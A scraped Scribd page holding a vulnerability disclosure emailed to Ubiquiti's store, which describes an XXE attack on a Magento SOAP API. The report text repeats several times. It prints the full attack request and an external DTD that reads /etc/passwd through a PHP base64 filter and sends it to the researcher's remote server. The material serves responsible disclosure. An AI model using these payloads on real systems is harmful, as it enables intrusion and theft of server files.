Scribd Logo
Upload

Welcome to Scribd!

  • 864 views

    UBNT XXE Vulnerability

    Uploaded by

    api-279685448
    I submitted a vulnerability report through your online form, but also wanted to send it via email due to its nature. Wanted to make sure it got through okay. As you will see from below, I have extracted your PASSWD file using this bug as a POC. XXE Attack This is our payload request POST /index.php/api/soap/index/ HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "urn:Mage_Api_Model_Server_HandlerAction" Host: store.ubnt.com Content-Length: 583 Expect: 100-continue Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://www.blsecurity.com/attack/pub2.xml"> %remote; %param1; ]> FULL ATTACK REQUEST IN ATTCHED DOC. Hosted on my remote server is pub2.xml. The contents are – <!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" > <!ENTITY % param1 '<!ENTITY % external SYSTEM "">http://www.blsecurity.com/%payload;">' > %param1; %external; We have to use a PHP filter in order to extract the data as it would cause XML errors Sending our request we receive an error No DTD's Allowed However if we look at our web logs, we see – The full url request sent back to www.blsecurity.com is –

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    UBNT XXE Vulnerability

    Uploaded by

    api-279685448
    864 views1 page
    I submitted a vulnerability report through your online form, but also wanted to send it via email due to its nature. Wanted to make sure it got through okay. As you will see from below, I have extracted your PASSWD file using this bug as a POC. XXE Attack This is our payload request POST /index.php/api/soap/index/ HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "urn:Mage_Api_Model_Server_HandlerAction" Host: store.ubnt.com Content-Length: 583 Expect: 100-continue Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://www.blsecurity.com/attack/pub2.xml"> %remote; %param1; ]> FULL ATTACK REQUEST IN ATTCHED DOC. Hosted on my remote server is pub2.xml. The contents are – <!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" > <!ENTITY % param1 '<!ENTITY % external SYSTEM "">http://www.blsecurity.com/%payload;">' > %param1; %external; We have to use a PHP filter in order to extract the data as it would cause XML errors Sending our request we receive an error No DTD's Allowed However if we look at our web logs, we see – The full url request sent back to www.blsecurity.com is –

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    I submitted a vulnerability report through your online form, but also wanted to send it via email due to its nature. Wanted to make sure it got through okay. As you will see from below, I have extracted your PASSWD file using this bug as a POC. XXE Attack This is our payload request POST /index.php/api/soap/index/ HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "urn:Mage_Api_Model_Server_HandlerAction" Host: store.ubnt.com Content-Length: 583 Expect: 100-continue Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://www.blsecurity.com/attack/pub2.xml"> %remote; %param1; ]> FULL ATTACK REQUEST IN ATTCHED DOC. Hosted on my remote server is pub2.xml. The contents are – <!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" > <!ENTITY % param1 '<!ENTITY % external SYSTEM "">http://www.blsecurity.com/%payload;">' > %param1; %external; We have to use a PHP filter in order to extract the data as it would cause XML errors Sending our request we receive an error No DTD's Allowed However if we look at our web logs, we see – The full url request sent back to www.blsecurity.com is –

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    864 views1 page

    UBNT XXE Vulnerability

    Uploaded by

    api-279685448
    I submitted a vulnerability report through your online form, but also wanted to send it via email due to its nature. Wanted to make sure it got through okay. As you will see from below, I have extracted your PASSWD file using this bug as a POC. XXE Attack This is our payload request POST /index.php/api/soap/index/ HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "urn:Mage_Api_Model_Server_HandlerAction" Host: store.ubnt.com Content-Length: 583 Expect: 100-continue Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://www.blsecurity.com/attack/pub2.xml"> %remote; %param1; ]> FULL ATTACK REQUEST IN ATTCHED DOC. Hosted on my remote server is pub2.xml. The contents are – <!ENTITY % payload SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd" > <!ENTITY % param1 '<!ENTITY % external SYSTEM "">http://www.blsecurity.com/%payload;">' > %param1; %external; We have to use a PHP filter in order to extract the data as it would cause XML errors Sending our request we receive an error No DTD's Allowed However if we look at our web logs, we see – The full url request sent back to www.blsecurity.com is –

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 1

    POST /index.php/api/soap/index/ HTTP/1.

    1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "urn:Mage_Api_Model_Server_HandlerAction"
    Host: store.ubnt.com
    Content-Length: 583
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Proxy-Connection: Keep-Alive
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://www.blsecurity.com/attack/pub2
    .xml"> %remote; %param1; ]>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
    <s:Body s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi=
    "http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XM
    LSchema">
    <q1:login xmlns:q1="urn:Magento">
    <username xsi:type="xsd:string">aaaaa</username>
    <apiKey xsi:type="xsd:string">aaaaa</apiKey>
    </q1:login>
    </s:Body>
    </s:Envelope>

    You might also like